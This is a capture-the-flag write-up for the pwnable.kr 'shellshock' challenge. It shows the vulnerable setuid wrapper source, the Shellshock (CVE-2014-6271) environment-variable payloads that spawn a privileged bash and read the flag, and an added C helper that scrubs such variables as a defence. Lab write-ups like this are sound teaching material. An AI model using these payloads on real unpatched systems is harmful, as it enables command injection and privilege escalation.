pwnable.kr-shellshock

Challenge description:

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure 🙂
ssh [email protected] -p2222 (pw:guest)

The source of shellshock.c is:

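#define _GNU_SOURCE	/* setresuid() and setresgid() are GNU extensions */
#include <stdio.h>
#include <stdlib.h>	/* system() */
#include <unistd.h>	/* setresuid(), setresgid(), getegid() */
int main(){
	/* Set real, effective and saved IDs from the effective GID (return values are not checked) */
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	/* Runs the bundled bash; the caller's environment is inherited unchanged */
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}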

As the name suggests, this challenge requires exploiting the Shellshock vulnerability to get the flag. For a detailed explanation, see: http://www.myhack58.com/Article/html/3/62/2015/60779.htm

So we construct the payload: export foo='() { :; }; cat flag' to read the flag directly, or export foo='() { :; }; bash' to switch to a bash running as shellshock2 and then run a command to get the flag:

[email protected]:/home/shellshock$ export foo='() { :; }; bash'
[email protected]:/home/shellshock$ ./shellshock
[email protected]:/home/shellshock$
[email protected]:/home/shellshock$
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ whoami
shellshock
[email protected]:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
[email protected]:/home/shellshock$ id
uid=1048(shellshock) gid=1049(shellshock2) groups=1048(shellshock)

The final flag is: only if I knew CVE-2014-6271 ten years ago..!!
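The defensive counterpart to the wrapper above, as an added example that is not part of the original post or the challenge: before a privileged program calls system(), it removes every environment variable whose value starts with "() {", the prefix that pre-patch bash imported as a function definition. The helper names is_funcdef_value and scrub_funcdef_env are hypothetical, the payload string is constructed sample input, and updating bash remains the actual fix.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L	/* setenv(), unsetenv() */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Pre-patch bash treated any variable whose value begins with "() {"
 * as an exported function and kept parsing past the closing brace. */
static int is_funcdef_value(const char *value)
{
	return strncmp(value, "() {", 4) == 0;
}

/* Hypothetical helper: unset every such variable.
 * Returns the number removed, or -1 if memory runs out. */
static int scrub_funcdef_env(void)
{
	int removed = 0;
	for (size_t i = 0; environ[i] != NULL; ) {
		const char *eq = strchr(environ[i], '=');
		if (eq == NULL || !is_funcdef_value(eq + 1)) { i++; continue; }
		size_t len = (size_t)(eq - environ[i]);
		char *name = malloc(len + 1);
		if (name == NULL) return -1;
		memcpy(name, environ[i], len);
		name[len] = '\0';
		if (unsetenv(name) == 0) { removed++; i = 0; }	/* environ changed: rescan */
		else i++;					/* e.g. empty name: skip it */
		free(name);
	}
	return removed;
}

int main(void)
{
	/* Constructed sample input: the payload shape used in the write-up. */
	setenv("foo", "() { :; }; cat flag", 1);
	printf("removed %d variable(s)\n", scrub_funcdef_env());
	/* With foo gone, the shell started here has nothing to import. */
	return system("/bin/sh -c 'echo shock_me'") == 0 ? 0 : 1;
}
```

Patched bash exports functions in BASH_FUNC_name%% variables whose values use the same prefix, so this scrub removes those as well.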

About the Author

admin
